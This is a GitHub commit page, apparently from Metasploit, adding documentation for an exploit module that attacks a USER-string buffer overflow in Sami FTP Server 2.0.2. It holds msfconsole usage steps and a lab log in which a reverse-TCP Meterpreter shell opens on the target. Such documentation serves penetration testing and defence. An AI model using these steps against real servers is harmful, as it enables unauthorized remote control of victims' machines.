-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #14783, Update KarjaSoft Sami FTP Server v2.0.2 USER Overflow mo…
…dule
- Loading branch information
Showing
2 changed files
with
168 additions
and
58 deletions.
There are no files selected for viewing
71 changes: 71 additions & 0 deletions
71
documentation/modules/exploit/windows/ftp/sami_ftpd_user.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,71 @@ | ||
## Vulnerable Application | ||
|
||
This module exploits an unauthenticated stack buffer overflow in | ||
KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long | ||
USER string during login. | ||
|
||
The payload is triggered when the administrator opens the application | ||
GUI. If the GUI window is open at the time of exploitation, the | ||
payload will be executed immediately. Keep this in mind when selecting | ||
payloads. The application will crash following execution of the | ||
payload and will not restart automatically. | ||
|
||
When the application is restarted, it will re-execute the payload | ||
unless the payload has been manually removed from the SamiFTP.binlog | ||
log file. | ||
|
||
This module has been tested successfully on Sami FTP Server versions: | ||
|
||
* 2.0.2 on Windows XP SP0 (x86) | ||
* 2.0.2 on Windows 7 SP1 (x86) | ||
* 2.0.2 on Windows 7 SP1 (x64) | ||
* 2.0.2 on Windows 10 (1909) (x64) | ||
|
||
## Verification Steps | ||
|
||
Download: | ||
|
||
* https://web.archive.org/web/20140218061003if_/http://www.karjasoft.com/files/samiftp/samiftpd_install.exe | ||
|
||
Metasploit: | ||
|
||
1. `msfconsole` | ||
1. `use exploit/windows/ftp/sami_ftpd_user` | ||
1. `set rhosts <rhosts>` | ||
1. `exploit` | ||
|
||
## Options | ||
|
||
## Scenarios | ||
|
||
### KarjaSoft Sami FTP Server version 2.0.2 on Windows 10 (1909) (x64) | ||
|
||
``` | ||
msf6 > use exploit/windows/ftp/sami_ftpd_user | ||
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp | ||
msf6 exploit(windows/ftp/sami_ftpd_user) > set rhosts 172.16.191.199 | ||
rhosts => 172.16.191.199 | ||
msf6 exploit(windows/ftp/sami_ftpd_user) > check | ||
[*] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2. | ||
msf6 exploit(windows/ftp/sami_ftpd_user) > run | ||
[*] Started reverse TCP handler on 172.16.191.192:4444 | ||
[*] 172.16.191.199:21 - Executing automatic check (disable AutoCheck to override) | ||
[+] 172.16.191.199:21 - The target appears to be vulnerable. Sami FTP Server version 2.0.2. | ||
[*] 172.16.191.199:21 - Sending payload (1414 bytes) ... | ||
[*] Sending stage (175174 bytes) to 172.16.191.199 | ||
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:49874) at 2021-02-19 20:24:31 -0500 | ||
meterpreter > getuid | ||
Server username: DESKTOP-6VPIDIM\user | ||
meterpreter > sysinfo | ||
Computer : DESKTOP-6VPIDIM | ||
OS : Windows 10 (10.0 Build 18363). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 15 | ||
Meterpreter : x86/windows | ||
meterpreter > | ||
``` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters